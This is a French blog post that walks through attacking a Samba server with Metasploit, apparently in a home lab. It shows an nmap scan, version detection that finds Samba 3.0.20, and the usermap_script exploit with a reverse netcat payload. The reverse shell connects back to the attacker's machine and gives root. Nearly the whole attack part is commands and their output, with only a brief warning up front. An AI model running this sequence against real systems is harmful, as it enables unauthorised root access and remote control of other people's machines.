lundi 20 juin 2022

Metasploit : Exploitation d'une vulnérabilité Samba

 


 Metasploit: Exploitation d'une vulnérabilité Samba

Attention !

Cet article contient des techniques pouvant être dangereuses si elles sont utilisées à mauvais escient.

Je ne suis pas responsable d'utilisations illégales et d'éventuels problèmes avec la loi en cas d'utilisation malveillante.



└─# nmap -sV 192.168.1.38


139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Samba permet de partager des imprimantes... sur le réseau local. Version un peu vague entre 3.X et 4.X


msf6 > use auxiliary/scanner/smb/


   12  auxiliary/scanner/smb/smb_version                             normal  No     SMB Version Detection


msf6 > use auxiliary/scanner/smb/smb_version

msf6 auxiliary(scanner/smb/smb_version) >


msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.38

RHOSTS => 192.168.1.38

msf6 auxiliary(scanner/smb/smb_version) > exploit


[*] 192.168.1.38:445      -   Host could not be identified: Unix (Samba 3.0.20-Debian) N'a pas identifié la version mais donne indications Unix (Samba 3.2.20-Debian).

Recherche Internet permet de trouver des vulnérabilités Samba un exploit adapté dans Metasploit.


msf6 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script Exploit trouvé sur internet

[*] No payload configured, defaulting to cmd/unix/reverse_netcat

msf6 exploit(multi/samba/usermap_script) >


msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.38

RHOSTS => 192.168.1.38


msf6 exploit(multi/samba/usermap_script) > exploit


[*] Started reverse TCP handler on 192.168.1.33:4444 

[*] Command shell session 1 opened (192.168.1.33:4444 -> 192.168.1.38:58300) at 2022-06-20 09:37:04 +0200


pwd

/

whoami

root

Aucun commentaire:

Enregistrer un commentaire

Metasploit : Exploitation d'une vulnérabilité Samba

   Metasploit: Exploitation d'une vulnérabilité Samba Attention ! Cet article contient des techniques pouvant être dangereuses si elles...